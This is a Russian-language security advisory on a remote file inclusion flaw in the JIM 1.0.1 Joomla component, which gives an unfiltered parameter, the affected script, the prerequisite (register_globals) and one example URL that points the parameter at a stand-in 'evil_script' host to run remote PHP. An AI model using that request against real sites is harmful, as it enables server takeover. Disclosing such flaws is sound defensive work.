Программа: JIM (компонент Joomla) 1.0.1, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимостьсуществует из-за недостаточной обработки входных данных в параметре"mosConfig_absolute_path" в сценарииcomponents/com_jim/install.jim.php. Удаленный пользователь можетвыполнить произвольный PHP сценарий на целевой системе с привилегиямиWeb сервера. Для удачной эксплуатации уязвимости опция"register_globals" должна быть включена в конфигурационном файле PHP.Пример:
http://victim/[path]/administrator/components/com_jim/install.
jim.php?mosConfig_absolute_path=http://evil_script?
URL производителя: extensions.joomla.org/component…Itemid,35/
Решение: Способов устранения уязвимости не существует в настоящее время.